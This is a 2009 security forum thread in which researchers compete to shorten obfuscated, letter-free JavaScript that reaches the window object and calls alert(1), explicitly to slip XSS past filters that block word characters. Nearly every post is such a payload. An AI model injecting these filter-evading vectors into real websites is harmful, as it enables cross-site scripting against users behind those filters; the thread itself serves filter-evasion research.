New XSS vectors/Unusual Javascript

Re: New XSS vectors/Unusual Javascript

rsnake — Sun, 07 Jun 2009 20:55:16 -0500

Based on comments by sirdarckcat, I created a new folder for obfuscation tricks, because one long thread is just getting out of control, and I think you guys are onto bigger things than just XSS as well. Please post all future comments into this forum folder: http://sla.ckers.org/forum/list.php?24

Re: New XSS vectors/Unusual Javascript

C1c4Tr1Z — Sun, 07 Jun 2009 19:41:09 -0500

concat() also works:

({}=[].concat)()[0] == window

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Sun, 07 Jun 2009 06:09:51 -0500

Do I win yet? :D

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Sun, 07 Jun 2009 05:03:10 -0500

wow, that's cool
([],[].sort)() == window

we dont need assignments anymore

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Sat, 06 Jun 2009 17:33:01 -0500

(Å=[],[µ=!Å+Å][µ[È=++Å+Å+Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

88!

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Sat, 06 Jun 2009 08:33:13 -0500

Just when you think this contest is over...there goes another byte

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Fri, 05 Jun 2009 14:32:59 -0500

91
(É=[Å=É=[]][(µ=!É+É)[È=++Å+Å+Å]+({}+É)[Å]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

------------------------

90
(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Fri, 05 Jun 2009 10:53:11 -0500

This was hard work:-

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wKCKqwMHCw8TGyMnKy8zNzs%2FQ0dLT1NXW2Nna29zd3t%2Fg4eLj5OXm5%2Bjp6uvs7e7v8PHy8%2FT19vj5%2Bvv8%2Ff4kXyIpPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

I've reduced the code to generate the code block rather than each letter and now it's possible to define your own variables.

I could randomise the number generation and expressions too, I might do it

Re: New XSS vectors/Unusual Javascript

thornmaker — Fri, 05 Jun 2009 10:37:58 -0500

i love how inside each strings, the charaters required to get each letter decreases as you go along since you can reuse fragments gathered earlier

Re: New XSS vectors/Unusual Javascript

Matt Presson — Fri, 05 Jun 2009 10:22:25 -0500

Nuts. Just plain nuts.

-Matt

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Fri, 05 Jun 2009 03:32:08 -0500

Got it down to 93 now

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[Å+Å]+Ç[_]+º](Å)

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Fri, 05 Jun 2009 02:25:28 -0500

actually it does depending on the charset (on php), but here we are just sticking to a-zA-Z0-9

Greetz!!

Re: New XSS vectors/Unusual Javascript

holiman — Fri, 05 Jun 2009 01:36:24 -0500

Really cool stuff !I love it!

(Although, as Swedish, I am a bit offended that Å does not count as an alphabetic letter... )

Re: New XSS vectors/Unusual Javascript

thrill — Fri, 05 Jun 2009 00:46:50 -0500

you people seriously worry me.. pretty soon I'm going to have to call shenanigans.. :)

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 21:56:02 -0500

x=[].reverse,x() === window

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Thu, 04 Jun 2009 20:57:05 -0500

anyway, this bypasses the filter for /\w/

(É=[É=[]][(µ=!É+É)[È=-~-~-~É]+({}+É)[Å=È/È]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[È+~É]+Ç[È]+ª](Å)

not even $.. god.. why so serious?

Greetz!!

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 20:54:23 -0500

ok this then :P

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+º](Å)

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Thu, 04 Jun 2009 20:47:19 -0500

this is an a: ª

wtf what is alnum now?

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 20:37:51 -0500

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(ª=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+ª](Å)

94

Re: New XSS vectors/Unusual Javascript

Anonymous User — Thu, 04 Jun 2009 17:17:46 -0500

(µ=[µ=[]][(ø=!µ+µ)[ª=-~-~-~µ]+({}+µ)[ª/ª]+(æ=(µª=!!ª+µ)[ª/ª]+µª[+µ])])()[ø[ª/ª]+ø[ª+~µ]+µª[ª]+æ](ª/ª)

101... and no quotes :) and works in Firebug (like anyone would care *g*)

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 16:27:31 -0500

Ok now I'm cheating :) cheap shot I know. jeez anything to win haha

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[_/_]+(ª=($_=!''+$)[_/_]+$_[+$])])()[µ[_/_]+µ[_+~$]+$_[_]+ª](_/_)

101!

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 14:58:53 -0500

@mario

That's awesome, I didn't think that would be shortened

Re: New XSS vectors/Unusual Javascript

Anonymous User — Thu, 04 Jun 2009 14:31:30 -0500

@sdc I did some homework for you :)

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])],$()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

106

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 12:02:25 -0500

window['Event']['constructor']['__proto__']['__proto__']['__parent__']['_content'].alert(1)

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 09:15:56 -0500

Very nice :)

Re: New XSS vectors/Unusual Javascript

Matt Presson — Thu, 04 Jun 2009 08:35:27 -0500

Nice.

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Thu, 04 Jun 2009 08:13:19 -0500

ok, you want to play like that, lets play like that.

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+($_)[+$])],$()[(__)[_/_]+(__)[_+~$]+($_)[_]+$$](_/_)

114

Re: New XSS vectors/Unusual Javascript

Matt Presson — Thu, 04 Jun 2009 08:09:33 -0500

$=[$=[]][(!$+$)[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+$)[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'') - 134 chars

Re: New XSS vectors/Unusual Javascript

Gareth Heyes — Thu, 04 Jun 2009 04:01:51 -0500

alphanumeric === a-zA-Z0-9

:P

Re: New XSS vectors/Unusual Javascript

sirdarckcat — Thu, 04 Jun 2009 03:20:10 -0500

ah true.. in firebug you codes dont work hehe... that's why I was confused.

(ohhh you are cheating, using _ matches as a word char..)